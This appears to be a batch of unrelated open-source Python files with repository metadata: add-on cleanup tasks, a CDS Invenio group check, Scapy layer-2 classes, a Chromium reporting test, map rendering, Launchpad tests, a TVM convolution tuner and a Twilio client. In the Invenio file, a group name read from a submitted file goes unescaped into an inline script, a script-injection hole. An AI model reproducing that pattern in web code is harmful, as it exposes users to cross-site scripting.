ActivityLog.objects.filter(created__lt=days_ago(90))
.exclude(action__in=amo.LOG_KEEP)
.values_list('id', flat=True)
)
for chunk in chunked(logs, 100):
tasks.delete_logs.delay(chunk)
two_weeks_ago = days_ago(15)
# Hard-delete stale add-ons with no versions. No email should be sent.
versionless_addons = Addon.unfiltered.filter(
versions__pk=None, created__lte=two_weeks_ago
).values_list('pk', flat=True)
for chunk in chunked(versionless_addons, 100):
delete_addons.delay(chunk, with_deleted=True)
    # Delete stale FileUploads.
    stale_uploads = FileUpload.objects.filter(created__lte=two_weeks_ago).order_by('id')
for file_upload in stale_uploads:
log.info(
'[FileUpload:{uuid}] Removing file: {path}'.format(
uuid=file_upload.uuid, path=file_upload.path
)
)
if file_upload.path:
try:
storage.delete(file_upload.path)
except OSError:
pass
file_upload.delete()
# Delete stale ScannerResults.
ScannerResult.objects.filter(upload=None, version=None).delete()
# Delete fake emails older than 90 days
FakeEmail.objects.filter(created__lte=days_ago(90)).delete()
def write_sitemaps(section=None, app_name=None):
index_url = get_sitemap_path(None, None)
sitemaps = get_sitemaps()
if (not section or section == 'index') and not app_name:
with storage.open(index_url, 'w') as index_file:
log.info('Writing sitemap index')
index_file.write(render_index_xml(sitemaps))
for _section, _app_name, _page in get_sitemap_section_pages(sitemaps):
if (section and section != _section) or (app_name and app_name != _app_name):
continue
if _page % 1000 == 1:
# log an info message every 1000 pages in a _section, _app_name
log.info(f'Writing sitemap file for {_section}, {_app_name}, {_page}')
filename = get_sitemap_path(_section, _app_name, _page)
with storage.open(filename, 'w') as sitemap_file:
sitemap_object = sitemaps.get((_section, amo.APPS.get(_app_name)))
if not sitemap_object:
continue
content = sitemap_object.render(app_name=_app_name, page=_page)
sitemap_file.write(content)
|
lbjay/cds-invenio
|
modules/websubmit/lib/functions/Check_Group.py
|
Python
|
gpl-2.0
| 2,200
| 0.010455
|
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
import os
import re
from invenio.dbquery import run_sql
from invenio.websubmit_config import InvenioWebSubmitFunctionStop
def Check_Group(parameters, curdir, form, user_info=None):
"""
Check that a group exists.
Read from file "/curdir/Group"
If the group does not exist, switch to page 1, step 0
"""
#Path of file containing group
if os.path.exists("%s/%s" % (curdir,'Group')):
fp = open("%s/%s" % (curdir,'Group'),"r")
group = fp.read()
group = group.replace("/","_")
group = re.sub("[\n\r]+","",group)
res = run_sql ("""SELECT id FROM usergroup WHERE name = %s""", (group,))
if len(res) == 0:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
else:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
return ""
|
kisel/trex-core
|
scripts/external_libs/scapy-2.3.1/python3/scapy/layers/l2.py
|
Python
|
apache-2.0
| 17,955
| 0.017154
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Classes and functions for layer 2 protocols.
"""
import os,struct,time
from scapy.base_classes import Net
from scapy.config import conf
from scapy.packet import *
from scapy.ansmachine import *
from scapy.plist import SndRcvList
from scapy.fields import *
from scapy.sendrecv import srp,srp1
from scapy.arch import get_if_hwaddr
#################
## Tools ##
#################
class Neighbor:
def __init__(self):
self.resolvers = {}
def register_l3(self, l2, l3, resolve_method):
self.resolvers[l2,l3]=resolve_method
def resolve(self, l2inst, l3inst):
k = l2inst.__class__,l3inst.__class__
if k in self.resolvers:
return self.resolvers[k](l2inst,l3inst)
def __repr__(self):
return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2,l3 in self.resolvers)
conf.neighbor = Neighbor()
conf.netcache.new_cache("arp_cache", 120) # cache entries expire after 120s
@conf.commands.register
def getmacbyip(ip, chainCC=0):
"""Return MAC address corresponding to a given IP address"""
if isinstance(ip,Net):
ip = next(iter(ip))
ip = inet_ntoa(inet_aton(ip))
tmp = inet_aton(ip)
if (tmp[0] & 0xf0) == 0xe0: # mcast @
return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1]&0x7f,tmp[2],tmp[3])
iff,a,gw = conf.route.route(ip)
if ( (iff == "lo") or (ip == conf.route.get_if_bcast(iff)) ):
return "ff:ff:ff:ff:ff:ff"
if gw != "0.0.0.0":
ip = gw
mac = conf.netcache.arp_cache.get(ip)
if mac:
return mac
res = srp1(Ether(dst=ETHER_BROADCAST)/ARP(op="who-has", pdst=ip),
type=ETH_P_ARP,
iface = iff,
timeout=2,
verbose=0,
chainCC=chainCC,
nofilter=1)
if res is not None:
mac = res.payload.hwsrc
conf.netcache.arp_cache[ip] = mac
return mac
return None
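# Illustrative usage sketch (added for clarity, not part of the original module); the
# address below is hypothetical, and resolution only succeeds for a reachable host on
# the local segment with sufficient privileges to send ARP requests:
#   mac = getmacbyip("192.168.0.1")   # e.g. "aa:bb:cc:dd:ee:ff", or None on timeout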
### Fields
class DestMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class SourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class ARPSourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
### Layers
ETHER_TYPES['802_AD'] = 0x88a8
class Ether(Packet):
name = "Ethernet"
fields_desc = [ MACField("dst","00:00:00:01:00:00"),
MACField("src","00:00:00:02:00:00"),
XShortEnumField("type", 0x9000, ETHER_TYPES) ]
def hashret(self):
return struct.pack("H",self.type)+self.payload.hashret()
def answers(self, other):
if isinstance(other,Ether):
if self.type == other.type:
return self.payload.answers(other.payload)
return 0
    def mysummary(self):
return self.sprintf("%src% > %dst% (%type%)")
    @classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
return Dot3
return cls
class Dot3(Packet):
name = "802.3"
fields_desc = [ DestMACField("dst"),
MACField("src", ETHER_ANY),
LenField("len", None, "H") ]
def extract_padding(self,s):
l = self.len
return s[:l],s[l:]
def answers(self, other):
if isinstance(other,Dot3):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return "802.3 %s > %s" % (self.src, self.dst)
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] > 1500:
return Ether
return cls
class LLC(Packet):
name = "LLC"
fields_desc = [ XByteField("dsap", 0x00),
XByteField("ssap", 0x00),
ByteField("ctrl", 0) ]
conf.neighbor.register_l3(Ether, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
conf.neighbor.register_l3(Dot3, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class CookedLinux(Packet):
name = "cooked linux"
fields_desc = [ ShortEnumField("pkttype",0, {0: "unicast",
4:"sent-by-us"}), #XXX incomplete
XShortField("lladdrtype",512),
ShortField("lladdrlen",0),
StrFixedLenField("src","",8),
XShortEnumField("proto",0x800,ETHER_TYPES) ]
class SNAP(Packet):
name = "SNAP"
fields_desc = [ X3BytesField("OUI",0x000000),
XShortEnumField("code", 0x000, ETHER_TYPES) ]
conf.neighbor.register_l3(Dot3, SNAP, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class Dot1Q(Packet):
name = "802.1Q"
aliastypes = [ Ether ]
fields_desc = [ BitField("prio", 0, 3),
BitField("id", 0, 1),
BitField("vlan", 1, 12),
XShortEnumField("type", 0x0000, ETHER_TYPES) ]
def answers(self, other):
if isinstance(other,Dot1Q):
if ( (self.type == other.type) and
(self.vlan == other.vlan) ):
return self.payload.answers(other.payload)
else:
return self.payload.answers(other)
return 0
def default_payload_class(self, pay):
if self.type <= 1500:
return LLC
return conf.raw_layer
def extract_padding(self,s):
if self.type <= 1500:
return s[:self.type],s[self.type:]
return s,None
def mysummary(self):
if isinstance(self.underlayer, Ether):
return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")
else:
return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
conf.neighbor.register_l3(Ether, Dot1Q, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class STP(Packet):
name = "Spanning Tree Protocol"
fields_desc = [ ShortField("proto", 0),
ByteField("version", 0),
ByteField("bpdutype", 0),
ByteField("bpduflags", 0),
ShortField("rootid", 0),
MACField("rootmac", ETHER_ANY),
IntField("pathcost", 0),
ShortField("bridgeid", 0),
MACField("bridgemac", ETHER_ANY),
ShortField("portid", 0),
BCDFloatField("age", 1),
BCDFloatField("maxage", 20),
BCDFloatField("hellotime", 2),
BCDFloatField("fwddelay", 15) ]
class EAPOL(Packet):
name = "EAPOL"
fields_desc = [ ByteField("version", 1),
ByteEnumField("type", 0, ["EAP_PACKET", "START", "LOGOFF", "KEY", "ASF"]),
LenField("len", None, "H") ]
EAP_PACKET= 0
START = 1
LOGOFF = 2
KEY = 3
ASF = 4
def extract_padding(self, s):
l = self.len
return s[:l],s[l:]
def hashret(self):
#return chr(self.type)+self.payload.hashret()
return bytes([self.type])+self.payload.hashret()
def answers(self, other):
if isinstance(other,EAPOL):
if ( (self.type == self.EAP_PACKET) and
(other.type == self.EAP_PACKET) ):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return self.sprintf("EAPOL %EAPOL.type%")
class EAP(Packet):
name = "EAP"
fields_desc = [ ByteEnumField("code", 4, {1:"REQUEST",2:"RESPONSE",3:"SUCCESS",4:"FAILURE"}),
ByteField("id", 0),
ShortField("len",None),
ConditionalField(ByteEnumField("type",0, {1:"ID",4:"MD5"}), lambda pkt:pkt.
|
chromium/chromium
|
chrome/test/enterprise/e2e/connector/realtime_reporting_bce/reporting_server.py
|
Python
|
bsd-3-clause
| 1,846
| 0.003792
|
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from googleapiclient.discovery import build
from google.oauth2 import service_account
class RealTimeReportingServer():
SCOPES = ['https://www.googleapis.com/auth/admin.reports.audit.readonly']
USER_EMAIL = 'admin@beyondcorp.bigr.name'
def create_reports_service(self, user_email):
"""Build and returns an Admin SDK Reports service object authorized with
the service accounts that act on behalf of the given user.
Args:
user_email: The email of the user. Needs permissions to access
the Admin APIs.
Returns:
Admin SDK reports service object.
"""
localDir = os.path.dirname(os.path.abspath(__file__))
    filePath = os.path.join(localDir, 'service_accountkey.json')
credentials = service_account.Credentials.from_service_account_file(
filePath, scopes=self.SCOPES)
delegatedCreds = credentials.create_delegated(user_email)
return build('admin', 'reports_v1', credentials=delegatedCreds)
def lookupevents(self, eventName, startTime, deviceId):
containsEvent = False
reportService = self.create_reports_service(self.USER_EMAIL)
results = reportService.activities().list(
userKey='all',
        applicationName='chrome',
customerId='C029rpj4z',
eventName=eventName,
startTime=startTime).execute()
activities = results.get('items', [])
for activity in activities:
for event in activity.get('events', []):
for parameter in event.get('parameters', []):
if parameter['name'] == 'DEVICE_ID' and \
parameter['value'] in deviceId:
containsEvent = True
break
return containsEvent
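# Illustrative usage sketch (added for clarity, not part of the original file); the
# event name, timestamp and device id below are hypothetical:
#   server = RealTimeReportingServer()
#   found = server.lookupevents('UNSAFE_SITE_VISIT', '2021-06-01T00:00:00Z', ['device-123'])
#   # found is True only when a matching DEVICE_ID parameter appears in the report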
|
hishivshah/WorldPop
|
code/create_zanzibar_boundary_map.py
|
Python
|
mit
| 1,981
| 0.002524
|
import logging
import mapnik
import xml.etree.ElementTree as ET
import os
import subprocess
import tempfile
# Set up logging
logging.basicConfig(format="%(asctime)s|%(levelname)s|%(message)s", level=logging.INFO)
# Parameters
shpPath = "C:/Projects/BirthsAndPregnanciesMapping/data/2014-04-24/Zanzibar/Zanzibar.shp"
epsDir = "C:/Projects/BirthsAndPregnanciesMapping/results/eps"
max_img_size = 1000 # Max width or height of output image
# Create style
stroke = mapnik.Stroke()
stroke.color = mapnik.Color(0,0,0)
stroke.width = 1.0
symbolizer = mapnik.LineSymbolizer(stroke)
rule = mapnik.Rule()
rule.symbols.append(symbolizer)
style = mapnik.Style()
style.rules.append(rule)
# Create Datasource
datasource = mapnik.Shapefile(file=shpPath)
# Create layer
layer = mapnik.Layer("boundaries")
layer.datasource = datasource
layer.styles.append("boundariesStyle")
# Calculate image output size
envelope = datasource.envelope()
dLong = envelope.maxx - envelope.minx
dLat = envelope.maxy - envelope.miny
aspectRatio = dLong / dLat
if dLong > dLat:
width = max_img_size
height = int(width / aspectRatio)
elif dLat > dLong:
    height = max_img_size
width = int(aspectRatio * height)
else:
width = max_img_size
height = max_img_size
# Create map
map = mapnik.Map(width, height)
map.append_style("boundariesStyle", style)
map.layers.append(layer)
map.zoom_all()
# Output to temporary postscript file
outPsPath = os.path.join(tempfile.gettempdir(), "ZanzibarAdminBoundaries.ps")
mapnik.render_to_file(map, outPsPath)
# Convert postscript to EPS file using ghostscript
outEpsPath = os.path.join(epsDir, "ZanzibarAdminBoundaries.eps")
subprocess.call(["C:/Program Files/gs/gs9.14/bin/gswin64c",
"-dDEVICEWIDTHPOINTS=%s" % width,
"-dDEVICEHEIGHTPOINTS=%s" % height,
"-sDEVICE=eps2write",
"-o",
outEpsPath,
outPsPath])
# Delete temporary file
os.remove(outPsPath)
|
abramhindle/UnnaturalCodeFork
|
python/testdata/launchpad/lib/lp/code/browser/tests/test_sourcepackagerecipebuild.py
|
Python
|
agpl-3.0
| 11,028
| 0.000091
|
# Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests for the source package recipe view classes and templates."""
__metaclass__ = type
from mechanize import LinkNotFoundError
from storm.locals import Store
from testtools.matchers import StartsWith
import transaction
from zope.component import getUtility
from zope.security.interfaces import Unauthorized
from zope.security.proxy import removeSecurityProxy
from lp.buildmaster.enums import BuildStatus
from lp.registry.interfaces.person import IPersonSet
from lp.services.webapp import canonical_url
from lp.soyuz.interfaces.processor import IProcessorSet
from lp.testing import (
admin_logged_in,
ANONYMOUS,
BrowserTestCase,
login,
logout,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
from lp.testing.pages import (
extract_text,
find_main_content,
find_tags_by_class,
setupBrowser,
setupBrowserForUser,
)
from lp.testing.sampledata import ADMIN_EMAIL
class TestCanonicalUrlForRecipeBuild(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_canonical_url(self):
owner = self.factory.makePerson(name='ppa-owner')
ppa = self.factory.makeArchive(owner=owner, name='ppa')
build = self.factory.makeSourcePackageRecipeBuild(archive=ppa)
self.assertThat(
canonical_url(build),
StartsWith(
'http://launchpad.dev/~ppa-owner/+archive/ppa/+recipebuild/'))
class TestSourcePackageRecipeBuild(BrowserTestCase):
"""Create some sample data for recipe tests."""
layer = DatabaseFunctionalLayer
def setUp(self):
"""Provide useful defaults."""
super(TestSourcePackageRecipeBuild, self).setUp()
self.admin = getUtility(IPersonSet).getByEmail(ADMIN_EMAIL)
self.chef = self.factory.makePerson(
displayname='Master Chef', name='chef')
self.user = self.chef
self.ppa = self.factory.makeArchive(
displayname='Secret PPA', owner=self.chef, name='ppa')
self.squirrel = self.factory.makeDistroSeries(
displayname='Secret Squirrel', name='secret', version='100.04',
distribution=self.ppa.distribution)
naked_squirrel = removeSecurityProxy(self.squirrel)
naked_squirrel.nominatedarchindep = self.squirrel.newArch(
'i386', getUtility(IProcessorSet).getByName('386'), False,
self.chef, supports_virtualized=True)
def makeRecipeBuild(self):
"""Create and return a specific recipe."""
chocolate = self.factory.makeProduct(name='chocolate')
        cake_branch = self.factory.makeProductBranch(
owner=self.chef, name='cake', product=chocolate)
recipe = self.factory.makeSourcePackageRecipe(
owner=self.chef, distroseries=self.squirrel, name=u'cake_recipe',
description=u'This recipe builds a foo for disto bar, with my'
' Secret Squirrel changes.', branches=[cake_branch],
            daily_build_archive=self.ppa)
build = self.factory.makeSourcePackageRecipeBuild(
recipe=recipe)
return build
def test_cancel_build(self):
"""An admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Cancel build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Cancel build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
BuildStatus.SUPERSEDED,
build.status)
def test_cancel_build_not_admin(self):
"""No one but an admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+cancel', user=self.chef)
def test_cancel_build_wrong_state(self):
"""If the build isn't queued, you can't cancel it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
def test_rescore_build(self):
"""An admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = '1024'
browser.getControl('Rescore build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
build.buildqueue_record.lastscore,
1024)
def test_rescore_build_invalid_score(self):
"""Build scores can only take numbers."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = 'tentwentyfour'
browser.getControl('Rescore build').click()
self.assertEqual(
extract_text(find_tags_by_class(browser.contents, 'message')[1]),
'Invalid integer data')
def test_rescore_build_not_admin(self):
"""No one but admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+rescore', user=self.chef)
def test_rescore_build_wrong_state(self):
"""If the build isn't queued, you can't rescore it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
def test_rescore_build_wrong_state_stale_link(self):
"""Show sane error if you attempt to rescore a non-queued build.
This is the case where the user has a stale link that they click on.
"""
build = self.factory.makeSourcePackageRecipeBuild()
build.cancelBuild()
index_url = canonical_url(build)
browser = self.getViewBrowser(build, '+rescore', user=self.admin)
self.assertEqual(index_url, browser.url)
self.assertIn(
'Cannot rescore this build because it is not queued.',
browser.contents)
def test_rescore_build
|
hfp/libxsmm
|
samples/deeplearning/tvm_cnnlayer/mb1_tuned_latest.py
|
Python
|
bsd-3-clause
| 20,227
| 0.039996
|
#!/usr/bin/env python3
###############################################################################
# Copyright (c) Intel Corporation - All rights reserved. #
# This file is part of the LIBXSMM library. #
# #
# For information on the license, see the LICENSE file. #
# Further information: https://github.com/hfp/libxsmm/ #
# SPDX-License-Identifier: BSD-3-Clause #
###############################################################################
# Anand Venkat (Intel Corp.)
###############################################################################
import logging
import sys
import numpy as np
import tvm
import topi
import time
from topi.util import get_const_tuple
import math
import topi.testing
import xlwt
import argparse
import os
import ctypes
from tvm import autotvm
from tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner
parser = argparse.ArgumentParser()
parser.add_argument("-d", nargs=1, type=str, default=["resnet3"])
args = parser.parse_args()
layer = args.d[0]
#Resnet-50 layers (excluding first layer)
_resnet_layers ={
'resnet2':[1,256,64,56,56,1,1,0],
'resnet3':[1,64,64,56,56,1,1,0],
'resnet4':[1,64,64,56,56,3,1,1],
'resnet5':[1,64,256,56,56,1,1,0],
'resnet6':[1,512,256,56,56,1,2,0],
'resnet7':[1,128,256,56,56,1,2,0],
'resnet8':[1,128,128,28,28,3,1,1],
'resnet9':[1,512,128,28,28,1,1,0],
'resnet10':[1,128,512,28,28,1,1,0],
'resnet11':[1,1024,512,28,28,1,2,0],
'resnet12':[1,256,512,28,28,1,2,0],
'resnet13':[1,256,256,14,14,3,1,1],
'resnet14':[1,1024,256,14,14,1,1,0],
'resnet15':[1,256,1024,14,14,1,1,0],
'resnet16':[1,2048,1024,14,14,1,2,0],
'resnet17':[1,512,1024,14,14,1,2,0],
'resnet18':[1,512,512,7,7,3,1,1],
'resnet19':[1,2048,512,7,7,1,1,0],
'resnet20':[1,512,2048,7,7,1,1,0]
}
'''
Convert input from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_input(a_np, batch, in_channel,input_height,input_width,pad_height,pad_width,vlen,A):
to_return = np.zeros((batch, math.ceil(in_channel/vlen),input_height + 2*pad_height, input_width+ 2*pad_width,vlen),dtype = A.dtype)
for i in range(batch):
for j in range(math.ceil(in_channel/vlen)):
for k in range(input_height + 2*pad_height):
for l in range(input_width + 2*pad_width):
for m in range(vlen):
if k < pad_height or k >= input_height + pad_height or l < pad_width or l >= input_width+ pad_width or j*vlen + m >= in_channel:
to_return[i,j,k,l,m] = float(0)
else:
to_return[i,j,k,l,m] = a_np[i,j*vlen + m,k-pad_height,l-pad_width]
return to_return
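# Illustrative shape example (added for clarity, not part of the original file),
# assuming vlen = 16: an input a_np of shape (1, 64, 56, 56) with
# pad_height = pad_width = 1 becomes (1, 4, 58, 58, 16), i.e. the channel dimension
# is blocked by 16 and padding is applied to the spatial dimensions.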
'''
Convert output from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_output(a_np, batch, out_channel,output_height,output_width,vlen):
to_return = np.zeros((batch, out_channel,output_height, output_width), dtype = float)
for i in range(batch):
for j in range(math.ceil(out_channel/vlen)):
for k in range(output_height):
for l in range(output_width):
for m in range(vlen):
to_return[i,j*vlen + m,k,l] = a_np[i,j,k,l,m]
return to_return
'''
Convert weights from KCRS format to KCRS16C16K format where the innermost data dimension is vectorized for AVX-512
'''
def convert_weight(w_np, in_channel, out_channel, kernel_height, kernel_width, vlen,W):
to_return = np.zeros((math.ceil(out_channel/vlen), math.ceil(in_channel/vlen),kernel_height, kernel_width,vlen,vlen), dtype = W.dtype)
for i in range(math.ceil(out_channel/vlen)):
for j in range(math.ceil(in_channel/vlen)):
for k in range(kernel_height):
                for l in range(kernel_width):
for m in range(vlen):
for n in range(vlen):
if i*vlen + n >= out_channel or j*vlen + m >= in_channel:
to_return[i,j,k,l,m,n] =float(0)
else:
to_return[i,j,k,l,m,n] = w_np[i*vlen + n,j*vlen+ m,k,l]
return to_return
# Get the reference output tensor for correctness check
def get_ref_data(batch,out_channel,in_channel,input_height,input_width,kernel_height,kernel_width,stride_height,padding):
a_np = np.random.uniform(size=(batch,in_channel,input_height,input_width)).astype(float)
w_np = np.random.uniform(size=(out_channel,in_channel,kernel_height,kernel_width)).astype(float)
if batch == 1:
b_np = topi.testing.conv2d_nchw_python(a_np, w_np, stride_height, padding)
#b_np = topi.nn.conv2d_NCHWc(a_np, w_np,out_channel,kernel_height,stride_height,
# padding, layout="NCHWc", out_layout="NCHWc", out_dtype='float32')
if batch == 1:
return a_np, w_np, b_np
else:
return a_np, w_np
#special case for small height and width (e.g. h = w = 7), where (h*w) becomes the dimension of the brgemm (M)
def intrin_libxsmm_hxw(ofmblock,ofw,ifmblock, stride_width,ifw,rco, ifh,r,s, ifh_stride, ifw_stride,\
ofh, stride_height, out_channel,output_height, output_width, in_channel):
last_input_width_index = (ofw-1)*stride_width + s-1
last_input_height_index = (ofh-1)*stride_height + r-1
ry = tvm.reduce_axis((0, r), name='ry')
rx = tvm.reduce_axis((0, s), name='rx')
A = tvm.placeholder((rco,r,s,ifmblock, ofmblock), name='w')
B = tvm.placeholder((rco,last_input_height_index + 1,last_input_width_index + 1,ifmblock), name='b')
k = tvm.reduce_axis((0, ifmblock), name='k')
k_outer = tvm.reduce_axis((0, rco), name='k_outer')
C = tvm.compute(
(ofh,ofw,ofmblock),
lambda z,m,n: tvm.sum(A[k_outer,ry,rx,k,n] * B[k_outer,ry + z*stride_height,rx + m*stride_width,k], axis=[k_outer,ry,rx,k]),
name='out')
s1 = tvm.create_schedule(C.op)
ifw1,ofw1,ofmblock1 = s1[C].op.axis
rco_outer,ry,rx,rci = s1[C].op.reduce_axis
s1[C].reorder(ifw1,rco_outer,ry,rx,ofw1,ofmblock1,rci)
xx_ptr = tvm.decl_buffer(A.shape, A.dtype,
name="W",offset_factor = 1,
data_alignment=64)
yy_ptr = tvm.decl_buffer(B.shape, B.dtype,
name="X",offset_factor=1,\
strides=[tvm.var("s3"),tvm.var("s2"), ifmblock, 1],#offset_factor=16
data_alignment=64)
zz_ptr = tvm.decl_buffer(C.shape, C.dtype,
name="OUT",offset_factor=1,#offset_factor=1,
strides=[output_width*ofmblock, ofmblock, 1],
data_alignment=64)
def intrin_func(ins, outs):
        # tvm call extern is used to interface to the libxsmm batch reduce kernel gemm implementation
# rco*r*s is the number of batches
init_and_compute = tvm.call_extern ("int32","batch_reduce_kernel_init_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"),\
rco*r*s,ofmblock,ifmblock,r,s,ifh_stride,ifw_stride, ofw*ofh, stride_width)
reset = tvm.call_extern ("int32","batch_reduce_kernel_init", outs[0].access_ptr("w"),ofmblock, ofw*ofh)
body = tvm.call_extern ("int32","batch_reduce_kernel_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"), rco*r*s,ofmblock,\
ifmblock,ofw*ofh, stride_width,r,s, ifh_stride,ifw_stride)
if math.ceil(in_channel/ifmblock) == rco:
return init_and_compute, None, init_and_compute
else:
return init_and_compute,reset,body
with tvm.build_config(data_alignment=64):
return tvm.decl_tensor_intrin(C.op, intrin_func, name="GEMM",
binds= {A: xx_ptr,
|
tysonholub/twilio-python
|
twilio/rest/video/v1/room/room_participant/room_participant_subscribed_track.py
|
Python
|
mit
| 15,072
| 0.003715
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class SubscribedTrackList(ListResource):
""" """
def __init__(self, version, room_sid, participant_sid):
"""
Initialize the SubscribedTrackList
:param Version version: Version that contains the resource
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
"""
super(SubscribedTrackList, self).__init__(version)
# Path Solution
self._solution = {'room_sid': room_sid, 'participant_sid': participant_sid, }
self._uri = '/Rooms/{room_sid}/Participants/{participant_sid}/SubscribedTracks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams SubscribedTrackInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, limit=None, page_size=None):
"""
Lists SubscribedTrackInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
